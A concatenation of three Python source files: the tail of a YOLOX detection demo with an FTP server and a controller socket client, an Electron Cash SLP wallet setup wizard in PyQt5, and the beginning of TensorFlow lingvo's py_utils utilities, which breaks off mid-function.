), "TensorRT model is not found!\n Run python3 tools/trt.py first!"
model.head.decode_in_inference = False
decoder = model.head.decode_outputs
logger.info("Using TensorRT to inference")
else:
trt_file = None
decoder = None
predictor = Predictor(model, exp, COCO_CLASSES, trt_file, decoder, args.device, args.fp16, args.legacy)
current_time = time.localtime()
while True:
if handler.imagelist.qsize() > 0:
# result_image=image_demo(predictor, vis_folder, args.path, current_time, args.save_result)
try:
image_demo(predictor, vis_folder, args.path, current_time, args.save_result)
except Exception:
#logger.error("Exception :{}").format(Exception)
continue
# cv2.imshow("show", result_image)
# cv2.waitKey(1)
else:
time.sleep(0.0001)
continue
# def socket_threading():
# while True:
# conn, addr = s.accept()
# print("连接地址:", addr)
# client_list.append(conn)
# while True:
# try:
# data = conn.recv(1024) # 接收数据
# if len(data) == 0:
# client_list.remove(conn)
# break
# print('recive:', data.decode()) # 打印接收到的数据
# s_data = str(data, encoding="utf-8")
# imagelist.put(s_data)
# # conn.send(data.upper()) # 然后再发送数据
# except ConnectionResetError as e:
# client_list.remove(conn)
# print('关闭了正在占线的链接!')
# break
# conn.close()
def FTP_threading():
# 开启服务器
server = FTPServer(("0.0.0.0", 6000), handler)
server.serve_forever()
def start_controler_Client():
BUFSIZE = 1024
ADDR = (HOST_controler, PORT_controler)
global controler_tcpCliSock
global controler_connected
while True:
controler_tcpCliSock = socket(AF_INET, SOCK_STREAM)
port = random.randint(11560, 11569)
controler_tcpCliSock.settimeout(0.030)
try:
controler_tcpCliSock.bind(('0.0.0.0', port))
except Exception as e:
print(e)
time.sleep(3)
continue
while True:
try:
controler_tcpCliSock.connect(ADDR)
controler_connected = True
except Exception as e:
print(e)
time.sleep(5)
continue
print("connectted to control..")
break
# break
while controler_connected:
try:
data = controler_tcpCliSock.recv(BUFSIZE).decode()
print("controler :" + data)
if len(data) == 0:
controler_tcpCliSock.close()
controler_tcpCliSock = socket(AF_INET, SOCK_STREAM)
print('Controler disconnected......')
break
except Exception as e:
# print(e)
pass
if controler_connected == False:
controler_tcpCliSock.close()
print('Controler disconnected......')
# logger.warning('Controler disconnected......')
if __name__ == '__main__':
# s = socket()
# s.bind(("127.0.0.1", 2114))
# s.listen(-1)
#
# client_list = []
# thread1 = Thread(target=socket_threading)
# thread1.start()
thread2 = Thread(target=FTP_threading)
thread2.start()
thread3 = Thread(target=start_controler_Client)
thread3.start()
args = make_parser().parse_args()
exp = get_exp(args.exp_file, args.name)
main(exp, args)
|
installwizard.py
|
# -*- mode: python3 -*-
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash import Wallet, WalletStorage
from electroncash.util import UserCancelled, InvalidPassword, finalization_print_error
from electroncash.base_wizard import BaseWizard
from electroncash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
from .bip38_importer import Bip38Importer
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electron Cash is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage, partial_title='Install Wizard'):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electron Cash SLP Edition - ' + _(partial_title))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.setMinimumSize(600, 450)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electron-cash.svg')
self.show()
self.raise_()
# Track object lifecycle
finalization_print_error(self)
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
logo = QLabel()
logo.setPixmap(QPixmap(":icons/slp_logo_hollow.png").scaledToWidth(52))
logo.setMaximumWidth(52)
vbox.addWidget(QLabel(_("<hr><b>NOTE: This version of Electron Cash is SLP token aware.</b>")))
vbox.addWidget(logo)
vbox.addWidget(QLabel(_("New wallets SLP use m/44'/245'/0' as the address derivation path.") + '\n' \
+ _("Funds will not be accessible with non-SLP versions of Electron Cash.")))
vbox.addWidget(QLabel(_("To avoid losing SLP tokens, you should avoid opening a wallet on") + '\n' \
+ _("wallet software not aware of SLP tokens.")))
vbox.addWidget(QLabel(_("For more information visit: <a href=\"https://SimpleLedger.cash\">https://SimpleLedger.cash</a>")))
self.set_layout(vbox, title=_('Electron Cash SLP wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this SLP wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electron Cash. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QIcon(filename).pixmap(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options, can_skip=None):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self, can_skip=can_skip)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext, slayout.was_skipped
def bip38_prompt_for_pw(self, bip38_keys):
''' Reimplemented from basewizard superclass. Expected to return the pw
dict or None. '''
d = Bip38Importer(bip38_keys, parent=self.top_level_window())
res = d.exec_()
d.setParent(None) # python GC quicker if this happens
return d.decoded_keys # dict will be empty if user cancelled
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)[:3]
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext, was_skipped = self.seed_input(title, message, test, options=None, can_skip=True)
return seed, was_skipped
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password. Note that this dialog screen
cannot go back, and instead the user can only cancel."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def _add_extra_button_to_layout(self, extra_button, layout):
if (not isinstance(extra_button, (list, tuple))
or not len(extra_button) == 2):
return
but_title, but_action = extra_button
hbox = QHBoxLayout()
hbox.setContentsMargins(12,24,12,12)
but = QPushButton(but_title)
hbox.addStretch(1)
hbox.addWidget(but)
layout.addLayout(hbox)
but.clicked.connect(but_action)
def _add_extra_button_to_layout(self, extra_button, layout):
if (not isinstance(extra_button, (list, tuple))
or not len(extra_button) == 2):
return
but_title, but_action = extra_button
hbox = QHBoxLayout()
hbox.setContentsMargins(12,24,12,12)
but = QPushButton(but_title)
hbox.addStretch(1)
hbox.addWidget(but)
layout.addLayout(hbox)
but.clicked.connect(but_action)
@wizard_dialog
def confirm_dialog(self, title, message, run_next, extra_button=None):
self.confirm(message, title, extra_button=extra_button)
def confirm(self, message, title, extra_button=None):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, extra_button=None, *, disabled_indices=set(), disabled_tooltip=''):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
non_disabled = [i for i,v in enumerate(c_titles) if i not in disabled_indices]
if non_disabled:
# if there are any non-disabled items, make the first one pre-selected
checked_index = non_disabled[0]
else:
# otherwise ensure nothing is pre-selected
checked_index = -1
clayout = ChoicesLayout(message, c_titles, checked_index = checked_index,
disabled_indices = disabled_indices,
disabled_tooltip = disabled_tooltip)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electron Cash communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electron Cash "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
self.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(self, network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(1)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
linux_hw_wallet_support_dialog = None
def on_hw_wallet_support(self):
''' Overrides base wizard's noop impl. '''
if sys.platform.startswith("linux"):
if self.linux_hw_wallet_support_dialog:
self.linux_hw_wallet_support_dialog.raise_()
return
# NB: this should only be imported from Linux
from . import udev_installer
self.linux_hw_wallet_support_dialog = udev_installer.InstallHardwareWalletSupportDialog(self.top_level_window(), self.plugins)
self.linux_hw_wallet_support_dialog.exec_()
self.linux_hw_wallet_support_dialog.setParent(None)
self.linux_hw_wallet_support_dialog = None
else:
self.show_error("Linux only facility. FIXME!")
|
py_utils.py
|
# Lint as: python2, python3
# -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
from REDACTED.tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding
import REDACTED.transformer_lingvo.lingvo.compat as tf
from REDACTED.transformer_lingvo.lingvo.core import hyperparams
from REDACTED.transformer_lingvo.lingvo.core import ops
from REDACTED.transformer_lingvo.lingvo.core import retry
from REDACTED.transformer_lingvo.lingvo.core import symbolic
from REDACTED.transformer_lingvo.lingvo.core import tshape
import numpy as np
import six
from six.moves import range
from six.moves import zip
from REDACTED.google_research.model_pruning.python import pruning
# pylint: disable=g-direct-tensorflow-import
from REDACTED.tensorflow.core.framework import node_def_pb2
from REDACTED import rewriter_config_pb2
from REDACTED.tensorflow.python.framework import func_graph
from REDACTED.tensorflow.python.framework import function
from REDACTED.tensorflow.python.ops import init_ops
from REDACTED.tensorflow.python.tpu import tpu_function
from REDACTED.tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
tf.flags.DEFINE_bool('enable_asserts', True,
'If False, we disable all asserts.')
tf.flags.DEFINE_bool('enable_check_numerics', True,
'If False, we bypass calls to CheckNumerics.')
tf.flags.DEFINE_bool('print_debug_tensors', False,
'Whether to print debug tensors.')
tf.flags.DEFINE_string(
'xla_device', '', 'If non-empty, can be cpu, gpu, or tpu (case sensitive)')
tf.flags.DEFINE_bool(
'use_resource_var', True,
'Use ResourceVariable instead of RefVariable; this option is '
'enabled by default and will be removed in the future.')
tf.flags.DEFINE_bool(
'tpu_compatible', False, 'Create variables in a way compatible with TPU. '
'This should be true for any job that will interact '
'with variables or a checkpoint that will be produced '
'or consumed by TPU')
tf.flags.DEFINE_bool(
'pin_vars_to_cpu', False,
'Pin variables to cpu:0. This is useful for weight-sharing / multi-core '
'inference on TPUs in which TPU core variables are managed via '
'TPUPartitionedCallOp.')
tf.flags.DEFINE_bool(
'no_identity_on_vars', False,
'Do not add tf.identity() on vars. This allows TPUPartitionedCallOp to use'
'variable handles directly for weight-sharing / multi-core '
'inference on TPUs.')
tf.flags.DEFINE_bool('disable_py_utils_debug', False,
'If True disables all py_utils.Debug() logs.')
# NOTE: Using absl flags in libraries are frowned upon for several reasons:
#
# 1) They require app.run() or explicit flag parsing, preventing the use of
# these libraries in environments that don't look like normal binaries (colab
# notebooks).
#
# 2) They are process-level globals that cannot be scoped or configured except
# once during binary startup.
#
# Because py_utils is a library, no more flags should be used in this file; the
# existing flags are present for backwards compatibility. Instead, consider
# using a stack-scoped configuration object such as the Cluster object. We guard
# against issue 1 above by using _FromGlobal below, which uses the default value
# of the FLAG even if flags are unparsed.
FLAGS = tf.flags.FLAGS
def _FromGlobal(field_name):
"""Get 'field_name' from a global configuration object.
Currently the global configuration object used is FLAGS, but this may
change to Cluster() or an equivalent stack-scoped config object.
Args:
field_name: The string field name to look up.
Returns:
The value associated with the global configuration string 'field_name'.
"""
# TODO(b/145831327): check the field name in the current cluster object.
# If explicitly set, use that value instead of using the FLAG value.
# Now check the FLAGS object for backwards compatibility.
#
# If not explicitly set, get the field from the FLAGS object. If FLAGS
# have not been parsed yet, the default value of the flag will be used.
return FLAGS[field_name].value
ENQUEUE_OPS = '__lingvo_enqueue_ops'
TPU_EMBEDDING_LOAD_OPS = '__lingvo_tpu_embedding_load_ops'
TPU_EMBEDDING_RETRIEVE_OPS = '__lingvo_tpu_embedding_retrieve_ops'
TPU_EMBEDDING = '__tpu_embedding'
TPU_EMBEDDING_ACTIVATIONS = '__tpu_embedding_activations'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
def Assert(condition, data, *args, **kwargs):
if _FromGlobal('enable_asserts'):
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.debugging.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.debugging.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
return tf.group(
Assert(tf.reduce_all(tf.greater_equal(x, l)), [x], *args, **kwargs),
Assert(tf.reduce_all(tf.less(x, r)), [x], *args, **kwargs))
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'BABELFISH ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
raise ValueError('denorminator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x.name) + '_CheckNumerics'
return tf.debugging.check_numerics(x, message if message else x.name, *args,
**kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not _FromGlobal('enable_check_numerics'):
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
yield
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
"""Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
x = py_utils.Debug(x)
When the graph is built a regular log info line will be printed:
-DBG- py_utils_test.py:429 x=Tensor(...
Then when the tensor node is evaluated it will print lines like:
-DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
WARNING: The code that parses local variable names can fail. E.g. don't write
two Debug() calls on one line or a Debug() call that spans more than one line.
Args:
tensor: A tensor to print.
message: A message to print.
enabled: To enable the debugging.
summarize: Integer with number of tensor values to print.
more: An optional list of additional tensors.
Returns:
The tensor.
"""
if not enabled or _FromGlobal('disable_py_utils_debug'):
return tensor
if more is None:
more = []
stack = inspect.stack()[1][0]
caller = inspect.getframeinfo(stack)
caller_var = ''
caller_more_vars = []
if caller.code_context:
# Rough and likely to fail. But better than nothing.
caller_var = re.compile(r'Debug\((.*?)(\)|,).*$').search(
caller.code_context[0]).groups()[0]
if more:
more_vars = re.compile(r'more=\[(.*?)\].*$').search(
caller.code_context[0]).groups()[0]
caller_more_vars = more_vars.split(',')
the_class = ''
if 'self' in stack.f_locals:
the_class = stack.f_locals['self'].__class__.__name__
header = '-DBG- {}:{}:{}:{} {} '.format(
os.path.basename(caller.filename), the_class, caller.function,
caller.lineno, message)
info = '{}{}={}'.format(header, caller_var, tensor)
for name, val in zip(caller_more_vars, more):
info += ' {}={}'.format(name.strip(), val)
tf.logging.info(info)
if isinstance(tensor, tf.Tensor):
tensors = []
tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
tensors += [tf.constant('{}='.format(caller_var)), tensor]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}='.format(name.strip())), val]
info = '{}{} {}'.format(header, caller_var, tensor.name)
return tf.Print(tensor, tensors, info, summarize=summarize)
return tensor
def _Save(steps, prefix, key, val):
